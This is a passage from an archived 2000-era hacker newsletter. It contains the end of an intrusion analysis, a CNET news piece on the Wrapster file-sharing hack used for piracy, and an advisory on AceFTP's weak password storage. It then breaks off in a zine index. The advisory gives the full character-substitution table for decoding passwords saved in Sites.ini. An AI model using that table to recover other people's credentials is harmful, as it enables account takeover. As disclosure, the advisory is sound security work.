
While the steps we outlined above are above these simple, basic system level
administration actions, prevention of this kind of compromise is easily
done. Any organization should facilitate the spread of vendor supplied
security patches.

As noted in the introduction, we have attempted to contact the administrato=
rs
of the domains listed in the target lists for the distribution of the toolk=
it
or in the records of where the intruders connected. We are providing this
analysis to the community in an effort to facilitate the cleanup from this=
=20
ring of intrusions. It spreads worldwide, including Europe and the Pacific
Rim, focusing largely on academic instritutions. We have appreciated the=20
response from the community when contacted, and offer to help in any additi=
onal
ways.

Special thanks to George Weaver from PSU for some of his analysis on the SP=
ARC
trojans we found.

Section 4: Selected References
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Dietrich, Sven: Shaft Analysis: http://sled.gsfc.nasa.gov/~spock/shaft_anal=
ysis.txt

nmap http://www.insecure.org/nmap

netcat ftp://coast.cs.purdue.edu/pub/tool/unix/netcat


--J/dobhs11T7y2rNN
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2

iQCVAwUBOOLBWixiYuLsTgIxAQEb6QP/X3CXJVx+TdFHmHPjNn8je0ZpUUiT//Ra
9HgPe1LAgAbDEyQmDx26Gyvk2o8zXxYSazL2caz7B4xupnbPDrYWgDdXCyk//zqD
a/WYD5XzORlePaATW2ULV+ALFeoTmZBe0NXPKE6MtbBE4P+JLCDU+PvR3gbMYecL
1p028VzivgA=
=pBQV
-----END PGP SIGNATURE-----

--J/dobhs11T7y2rNN--




@HWA


112.0 Wrapster, the Napster hack fires up the trading fires.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by: Dragos Ruii


(You didn't have to stare too hard at the crystal ball to see this
one coming. Or the truly anonymous napster clones a la gnutella
that will be next. --dr)

Napster hack allows free distribution of software, movies
By John Borland Staff Writer, CNET News.com March 22, 2000, 4:15 p.m. PT

update A new program has been posted on the Internet that transforms
a popular music-trading network into a full-blown online swap meet capable
of trading videos and software.

The program, dubbed Wrapster, has been available for downloading since
yesterday. According to its developer, Wrapster allows any kind of file to
be listed and traded over the Napster network, which was designed to
recognize only MP3 music files.

CNET News.com was able to use the program to locate and download several
different types of files through Napster. A source at Napster said company
executives are aware of Wrapster but have not done anything to block its
use.

Wrapster joins a growing list of programs allowing the quick, free and
wide distribution of illegally copied files. The trend is bad news for
record companies, movie studios and software companies that have fought
hard to keep their wares from being pirated online.

Programs such as Wrapster and Nullsoft's Gnutella, which mimic and expand
on Napster, are quickly speeding the erosion of copyright protections
online, leaving copyright holders scrambling to keep up.

"(Copyright holders) are aggressively pursuing the issue in the courts,"
said Peter Schalestock, an attorney with Perkins Coie. "They'd like to
keep up with the technology, but that is turning into an arms race."


Napster, a program designed to let Internet users swap music files with
one another, has quickly moved to the heart of the controversy over
pirated music and online copyrights. The software allows people to share a
library of MP3 music files with anyone else on the Napster system and to
freely download songs directly from others' computers.

Napster's ease of use and the huge selection of music available through
the system have made it a favorite among college students and other
communities with high-speed Internet connections. Thousands of people can
frequently be found on the network in the evenings, often sharing nearly a
million songs with their peers.

This has infuriated the recording industry, which views Napster as a tool
for piracy. The Recording Industry Association of America (RIAA) has sued
the company, charging that its software is facilitating the illegal
distribution of material. The industry is asking courts for a potentially
huge sum of $100,000 per illegally distributed song.

Watch video "The overwhelming majority of the MP3 files offered on
Napster are infringing,"
the RIAA says on a Web page explaining its
position. "We believe Napster knows this and even encourages it."

To this point, the turmoil has been caused simply by the distribution of
music files. Wrapster raises the stakes, however.

The Wrapster program tricks the Napster software into thinking that any
file or set of files, including items such as software, videos or games,
are MP3 files.

Its author, identified as "Octavian" in the program's "about" file,
suggests using the software as a means for trading programs such as
Windows 2000. Octavian could not be reached for comment.

While aware of Wrapster, executives at Napster do not yet see it as a
problem.

"They really see it as something that's benign right now," said Dan Wool,
a spokesman for Napster. "Until it poses some kind of problem, they'll
just keep the status quo."


Napster proponents note that Wrapster's search capabilities aren't unique
online. A less well-known program dubbed iMesh allows people to swap
music, video and other multimedia files. That provides a broader range of
options than Napster itself, which only supports MP3 files, but falls
short of the capabilities of the new Wrapster technique.

The software also has spawned imitators offering expanded features.
Programmers at Nullsoft, the digital music player company recently
acquired by America Online, unveiled an open-source effort that, like
Wrapster, would allow any kind of file to be shared. Although AOL quickly
pulled the project from its site, the code is available elsewhere, and the
project may move ahead independently.

"Other programs have already tried to imitate Napster's system and even
taken it a step further,"
said Wayne Chang, a Haverhill, Mass., student
who manages Napster's online community bulletin boards. "Wrapster is just
ripping off the same idea, except this time disguising the files as the
only media that Napster currently recognizes."


The movie and software industries are watching the RIAA's experience
closely, aware that they'll ultimately be subjected to the same pressure.
They don't face the same risk of widespread piracy today because
high-speed Internet connections still aren't common enough to make
numerous downloads of their products feasible.

An audio MP3 file generally takes up to half an hour to download over a
dial-up connection and just seconds over a cable or DSL modem. A file such
as Windows 2000 or a Hollywood movie, however, could take all day over an
ordinary modem and potentially hours even over a fast connection.

Nevertheless, the studios and software manufacturers are doing their best
to protect their works against copying and to threaten potential pirates
with high-stakes lawsuits.

"It's an arms race as long as someone is trying to get around (copyright
protections),"
said Rich Taylor, vice president of public affairs for the
Motion Picture Association of America (MPAA). "The only things that are
preventing a full-blown explosion of video entertainment on the Net are
the lack of high-speed connections and the need to secure that digital
product."



-- dursec.com / kyx.net - we're from the future
http://www.dursec.com learn kanga-foo from security experts: CanSecWest -
May 10-12 Vancouver

Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD,
Max Vision/whitehats.com

@HWA

113.0 AceFTP vulnerabilty by Armour
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Armour (email)
http://www.2600.org.au/advisories/aceftp-032000.txt



Vulnerability in AceFTP's Password Storage
-------------------------------------------

by Armour - March 2000

Intro:
------
Following black-hand's advisory from November 1999/January 2000 on password
storage, it was discovered that AceFTP uses a similar character substitution
for local storage of user passwords.

Such storage is no better than a plaintext file containing the passwords.


Applies to:
-----------

AceFTP 2.4a - not tested on earlier versions.


Discussion:
-----------

AceFTP stores user passwords in the Sites.ini file, typically located at:

(C:\Program Files\AceExpertFTP\Sites.ini)

Exploit:
--------

Entering a password of abcdefghijklmnopqrstuvwxyz, we are able to derive
the letter substitution, printed below:

A= CB
B= C8
C= C9
D= CE
E= CF
F= CC
G= CD
H= C2
I= C3
J= C0
K= C1
L= C6
M= C7
N= C4
O= C5
P= DA
Q= DB
R= D8
S= D9
T= DE
U= DF
V= DC
W= DD
X= D2
Y= D3
Z= D0

Here are the contents of a sample Sites.ini file:

[multu]
Host=hhhh
Anonymous=0
User=h
SavePassword=1
Password=ºCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0
HostFolder=
Port=21
Firewall=1
LocalFolder1=
LocalFolder2=
LocalFolder3=
Comments=""

Working backwards with the substitution table above, we find that
ºCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0 represents
abcdefghijklmnopqrstuvwxyz.

If an intruder has network or physical access to the Sites.ini file on your
hard drive, then your passwords are compromised. The intruder will be
able to extract all necasssery information from the file to break into
your account(s).

Contact:
--------

I can be contacted on armour@swish.bur.st

-Armour

@HWA

114.0 Pursuit Zine #1 (Aug 99)
~~~~~~~~~~~~~~~~~~~~~~~~

Something I seem to have missed, looks like a one off, so i'll preserve
it here, you UK phreaks should like this, among others it covers a few
things of general interest, have a gander. - Ed


XXXX X
XXXX XX X X XX XXXX XXXX X X XX XXXXX
XX XX XX XX XXX XX XX XX XX XX XXX
XX XX XX XX XXX XXX XX XX XX
XXXXXX XX XX XX XXX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX
XX XXX X XXXXX XXX XXXX XX
XX
[ P U R S U i T - a u g 9 9 ] X

Index for this issue of PURSUiT

[0x00] Introduction by the staff
[0x01] Editor's notes by bxj
[0x02] Internet2 (i2) and Next Generation Internet (NGI) by Cyphunk
[0x05] AXS Script Makes WebServer Vulnerable by f0bic
[0x06] Boxing in the UK (series) by Oktal
[0x07] Introduction to firewalls by deadline
[0x08] The FileThief exploit by Mister-X and Alkatraz
[0x09] PURSUiT News update

If you got an article you want us to publish, please e-mail it to
bxj, foney_op or Cyphunk and after we'll read it we will decide
if to publish it in PURSUiT or n

← previous
next →

Comments

5
guest's profile picture
@guest


I have read so many articles on the topic of the blogger lovers except this post is truly a good article, keep it up.

3 years ago
guest's profile picture
@guest

Hello guys. And Bye.

neversurrenderboys ;)

3 years ago
guest's profile picture
@guest


I really like it when folks come together and share views. Great website, stick with it!

3 years ago
guest's profile picture
@guest

Hello from Happykiddi.

9 months ago
guest's profile picture
@guest

joel_dorron@gmail.com

2 months ago
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT